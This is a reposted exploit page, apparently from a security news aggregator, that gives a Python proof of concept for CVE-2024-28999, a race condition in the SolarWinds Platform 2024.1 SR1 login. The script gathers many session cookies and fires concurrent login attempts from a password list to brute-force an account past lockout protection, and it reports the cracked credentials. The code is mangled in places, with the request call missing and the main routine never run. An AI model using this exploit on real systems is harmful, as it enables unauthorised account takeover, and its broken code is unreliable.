SolarWinds Platform 2024.1 SR1 Race Condition
2024-6-27 00:23:34 Author:查看原文) 阅读量:3 收藏

SolarWinds Platform 2024.1 SR1 Race Condition

# Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition # CVE: CVE-2024-28999 # Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions # Author: Elhussain Fathy, AKA 0xSphinx import requests import urllib3 import asyncio import aiohttp urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED') # host = '' # username = "admin" # file_path = "passwords.txt" host = input("Enter the host: ") username = input("Enter the username: ") file_path = input("Enter the passwords file path: ") exploited = 0 url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F" passwords = [] with open(file_path, 'r') as file: for line in file: word = line.strip() passwords.append(word) print(f"Number of tested passwords: {len(passwords)}") headers = { 'Host': host, } sessions = [] for _ in range(len(passwords)): response = requests.get(url, headers=headers, verify=False, stream=False) cookies = response.headers.get('Set-Cookie', '') session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0] sessions.append(session_id) async def send_request(session, username, password): headers = { 'Host': host, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE', } data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}' async with aiohttp.ClientSession() as session: async with, headers=headers, data=data, ssl=False, allow_redirects=False) as response: if response.status == 302: global exploited exploited = 1 print(f"Exploited Successfully Username: {username}, Password: {password}") async def main(): tasks = [] for i in range(len(passwords)): session = sessions[i] password = passwords[i] task = asyncio.create_task(send_request(session, username, password)) tasks.append(task) await asyncio.gather(*tasks) if(not exploited): print("Exploitation Failed")


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